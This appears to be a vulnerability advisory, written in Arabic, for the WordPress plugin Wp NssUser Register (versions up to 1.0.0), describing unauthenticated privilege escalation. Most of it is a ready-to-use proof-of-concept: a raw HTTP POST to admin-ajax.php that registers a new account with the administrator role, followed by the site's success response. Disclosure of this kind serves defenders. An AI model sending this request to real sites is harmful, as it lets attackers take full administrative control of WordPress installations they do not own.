
Wp NssUser Register <= 1.0.0 - تصعيد امتيازات بدون مصادقة
Wp NssUser Register <= 1.0.0 - تصعيد الامتيازات بدون مصادقة
إن إضافة Wp NssUser Register الخاصة بـ WordPress عرضة لتصعيد الامتيازات في جميع الإصدارات حتى الإصدار 1.0.0 وما يشمل ذلك الإصدار. وهذا يتيح للمهاجمين غير المصادَق عليهم التسجيل في الموقع كمسؤولين.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Referer: http://example.com/
action=nssTheme_registration_form&rgName=admin2&[email protected]&rgFname=Attacker&rgLname=User&rgRole=administrator&rg_pass=evilpass
<p>successful, just Check this: </p> <a href="https://wp-dev.ddev.site/wp-login.php" title="Login">Login</a>